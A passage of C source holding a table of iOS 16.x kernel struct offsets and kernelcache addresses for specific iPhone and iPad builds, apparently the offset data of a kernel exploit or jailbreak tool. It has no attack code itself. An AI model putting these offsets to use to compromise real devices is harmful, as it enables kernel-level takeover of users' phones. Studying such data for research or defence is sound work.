= 0xfffffff00a410978, .kernelcache__vn_kqfilter = 0xfffffff007f3795c, }, // iOS 16.4 // // iOS 16.4 20E246 iPhone 12 // { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:42:59 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8101", .build_version = "20E246", .device_id = "iPhone13,2", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a491208, .kernelcache__gPhysBase = 0xfffffff00792bfc0, .kernelcache__gPhysSize = 0xfffffff00792bfc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff00792a198, .kernelcache__perfmon_devices = 0xfffffff00a4cf520, .kernelcache__perfmon_dev_open = 0xfffffff007ef064c, .kernelcache__ptov_table = 0xfffffff0078df188, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4ce990, .kernelcache__vm_pages = 0xfffffff0078dbeb8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078de128, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4ce988, .kernelcache__vn_kqfilter = 0xfffffff007f3f538, }, //iPhone 13 Pro Max iOS 16.4 20E246 { .kern_version = "Darwin Kernel Version 22.4.0: Mon Mar 6 20:43:00 PST 2023; root:xnu-8796.102.5~1/RELEASE_ARM64_T8110", .build_version = "20E246", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a465208, .kernelcache__gPhysBase = 0xfffffff007937fc0, .kernelcache__gPhysSize = 0xfffffff007937fc0 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936198, .kernelcache__perfmon_devices = 0xfffffff00a4a3520, .kernelcache__perfmon_dev_open = 0xfffffff007ef9210, .kernelcache__ptov_table = 0xfffffff0078eb180, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a4a2990, .kernelcache__vm_pages = 0xfffffff0078e7ec0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea130, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a4a2988, .kernelcache__vn_kqfilter = 0xfffffff007f45ae0, }, // iPhone 12 Pro Max iOS 16.2 20C5049e { .kern_version = "Darwin Kernel Version 22.2.0: Tue Nov 8 21:16:34 PST 2022; root:xnu-8792.60.55.132.1~1/RELEASE_ARM64_T8101", .build_version = "20C5049e", .device_id = "iPhone13,4", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x630, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a4419c0, .kernelcache__gPhysBase = 0xfffffff00785c258, .kernelcache__gPhysSize = 0xfffffff00785c258 + 0x8, .kernelcache__gVirtBase = 0xfffffff00785a438, .kernelcache__perfmon_devices = 0xfffffff00a47d5e0, .kernelcache__perfmon_dev_open = 0xfffffff007ef0f5c, .kernelcache__ptov_table = 0xfffffff00780f478, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a47c980, .kernelcache__vm_pages = 0xfffffff00780c190, .kernelcache__vm_page_array_beginning_addr = 0xfffffff00780e428, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a47c978, .kernelcache__vn_kqfilter = 0xfffffff007f43530, }, //iPhone 11 iOS 16.3 beta 1 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Dec 7 19:49:05 PST 2022; root:xnu-8792.80.21.112.1~1/RELEASE_ARM64_T8030", .build_version = "20D5024e", .device_id = "iPhone12,1", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x378 - 0x18, .thread__task_threads__prev = 0x378 - 0x18 + 0x8, .thread__map = 0x378, .thread__thread_id = 0x410, .thread__object_size = 0x4b8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3ed9b0, .kernelcache__gPhysBase = 0xfffffff00787fd28, .kernelcache__gPhysSize = 0xfffffff00787fd28 + 0x8, .kernelcache__gVirtBase = 0xfffffff00787df08, .kernelcache__perfmon_devices = 0xfffffff00a4295a0, .kernelcache__perfmon_dev_open = 0xfffffff007ef6010, .kernelcache__ptov_table = 0xfffffff007833360, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a428980, .kernelcache__vm_pages = 0xfffffff007830188, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007832310, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a428978, .kernelcache__vn_kqfilter = 0xfffffff007f48364, }, //iPhone 13 Pro Max 16.5 beta 1 { .kern_version = "Darwin Kernel Version 22.5.0: Fri Mar 17 16:32:22 PDT 2023; root:xnu-8796.120.16~14/RELEASE_ARM64_T8110", .build_version = "20F5028e", .device_id = "iPhone14,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x640, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x418, .thread__object_size = 0x4c0, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0xc0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a50da30, .kernelcache__gPhysBase = 0xfffffff0079501b8, .kernelcache__gPhysSize = 0xfffffff0079501b8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00794e390, .kernelcache__perfmon_devices = 0xfffffff00a54b750, .kernelcache__perfmon_dev_open = 0xfffffff007f1e7a8, .kernelcache__ptov_table = 0xfffffff007903280, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a54ab10, .kernelcache__vm_pages = 0xfffffff0078fffc0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007902230, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a54ab08, .kernelcache__vn_kqfilter = 0xfffffff007f6b3b4, }, { .kern_version = "Darwin Kernel Version 22.6.0: Wed Jun 28 20:51:46 PDT 2023; root:xnu-8796.142.1~1/RELEASE_ARM64_T8120", .build_version = "20G81", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x28, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0xf8, .proc__object_size = 0x730, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .thread__thread_id = 0x418, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a425208, .kernelcache__gPhysBase = 0xfffffff0079382c8, .kernelcache__gPhysSize = 0xfffffff0079382c8 + 0x8, .kernelcache__gVirtBase = 0xfffffff007936480, .kernelcache__perfmon_devices = 0xfffffff00a465300, .kernelcache__perfmon_dev_open = 0xfffffff007ef0a30, .kernelcache__ptov_table = 0xfffffff0078eb8e0, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a464790, .kernelcache__vm_pages = 0xfffffff0078e8008, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078ea890, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a464788, .kernelcache__vn_kqfilter = 0xfffffff007f3d0e8, }, // iPhone 14 Pro Max iOS 16.3 beta 2 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:39:26 PST 2023; root:xnu-8792.80.25.122.5~1/RELEASE_ARM64_T8120", .build_version = "20D5035i", .device_id = "iPhone15,3", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x648, .thread__task_threads__next = 0x380 - 0x18, .thread__task_threads__prev = 0x380 - 0x18 + 0x8, .thread__map = 0x380, .thread__thread_id = 0x420, .thread__object_size = 0x4c8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a3419c0, .kernelcache__gPhysBase = 0xfffffff007854168, .kernelcache__gPhysSize = 0xfffffff007854168 + 0x8, .kernelcache__gVirtBase = 0xfffffff007852348, .kernelcache__perfmon_devices = 0xfffffff00a37d5c0, .kernelcache__perfmon_dev_open = 0xfffffff007ed9fc0, .kernelcache__ptov_table = 0xfffffff007807510, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a37c980, .kernelcache__vm_pages = 0xfffffff0078041d0, .kernelcache__vm_page_array_beginning_addr = 0xfffffff0078064d0, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a37c978, .kernelcache__vn_kqfilter = 0xfffffff007f29ff0, }, //End beta iOS // iPad A12X and A12Z // A12X // iPad8,1 16.2 { .kern_version = "Darwin Kernel Version 22.1.0: Thu Oct 6 19:33:53 PDT 2022; root:xnu-8792.42.7~1/RELEASE_ARM64_T8020", .build_version = "20C65", .device_id = "iPad8,1", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x530, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2a9150, .kernelcache__gPhysBase = 0xfffffff00784f9d8, .kernelcache__gPhysSize = 0xfffffff00784f9d8 + 0x8, .kernelcache__gVirtBase = 0xfffffff00784dbc0, .kernelcache__perfmon_devices = 0xfffffff00a2e4300, .kernelcache__perfmon_dev_open = 0xfffffff007ec279c, .kernelcache__ptov_table = 0xfffffff007803890, .kernelcache__vm_first_phys_ppnum = 0xfffffff00a2e3780, .kernelcache__vm_pages = 0xfffffff0078006c8, .kernelcache__vm_page_array_beginning_addr = 0xfffffff007802850, .kernelcache__vm_page_array_ending_addr = 0xfffffff00a2e3778, .kernelcache__vn_kqfilter = 0xfffffff007f14d00, }, //16.3 { .kern_version = "Darwin Kernel Version 22.3.0: Wed Jan 4 21:24:51 PST 2023; root:xnu-8792.82.2~1/RELEASE_ARM64_T8020", .build_version = "20D47", .device_id = "iPad8,1", .fileglob__fg_ops = 0x0, .fileglob__fg_data = 0x40 - 0x8, .fileops__fo_kqfilter = 0x30, // .fileproc__fp_iocount = 0x0000, // .fileproc__fp_vflags = 0x0004, // .fileproc__fp_flags = 0x0008, // .fileproc__fp_guard_attrs = 0x000a, // .fileproc__fp_glob = 0x0010, // .fileproc__fp_guard = 0x0018, // .fileproc__object_size = 0x0020, .fileproc_guard__fpg_guard = 0x8, .kqworkloop__kqwl_state = 0x10, .kqworkloop__kqwl_p = 0x18, .kqworkloop__kqwl_owner = 0xd0, .kqworkloop__kqwl_dynamicid = 0xd0 + 0x18, .kqworkloop__object_size = 0x108, .pmap__tte = 0x0, .pmap__ttep = 0x8, .proc__p_list__le_next = 0x0, .proc__p_list__le_prev = 0x8, .proc__p_pid = 0x60, .proc__p_fd__fd_ofiles = 0x0, .proc__object_size = 0x538, .pseminfo__psem_usecount = 0x04, .pseminfo__psem_uid = 0x0c, .pseminfo__psem_gid = 0x10, .pseminfo__psem_name = 0x14, .pseminfo__psem_semobject = 0x38, // .psemnode__pinfo = 0x0000, // .psemnode__padding = 0x0008, // .psemnode__object_size = 0x0010, .semaphore__owner = 0x28, .specinfo__si_rdev = 0x18, .task__map = 0x28, .task__threads__next = 0x80 - 0x28, .task__threads__prev = 0x80 - 0x28 + 0x8, .task__itk_space = 0x300, .task__object_size = 0x628, .thread__task_threads__next = 0x368 - 0x18, .thread__task_threads__prev = 0x368 - 0x18 + 0x8, .thread__map = 0x368, .thread__thread_id = 0x400, .thread__object_size = 0x4a8, .uthread__object_size = 0x200, .vm_map_entry__links__prev = 0x00, .vm_map_entry__links__next = 0x08, .vm_map_entry__links__start = 0x10, .vm_map_entry__links__end = 0x18, .vm_map_entry__store__entry__rbe_left = 0x20, .vm_map_entry__store__entry__rbe_right = 0x28, .vm_map_entry__store__entry__rbe_parent = 0x30, .vnode__v_un__vu_specinfo = 0x78, ._vm_map__hdr__links__prev = 0x00 + 0x10, ._vm_map__hdr__links__next = 0x08 + 0x10, ._vm_map__hdr__links__start = 0x10 + 0x10, ._vm_map__hdr__links__end = 0x18 + 0x10, ._vm_map__hdr__nentries = 0x30, ._vm_map__hdr__rb_head_store__rbh_root = 0x38, ._vm_map__pmap = 0x40, ._vm_map__hint = 0x90 + 0x08, ._vm_map__hole_hint = 0x90 + 0x10, ._vm_map__holes_list = 0x90 + 0x18, ._vm_map__object_size = 0x0, .kernelcache__kernel_base = 0xfffffff007004000, .kernelcache__cdevsw = 0xfffffff00a2b9178, .kernelcache__gPhysBase = 0xfffffff007853d48, .kernelcache__gPhysSize = 0xfffffff007853d48 + 0x8, .kernelcache__gVirtBase = 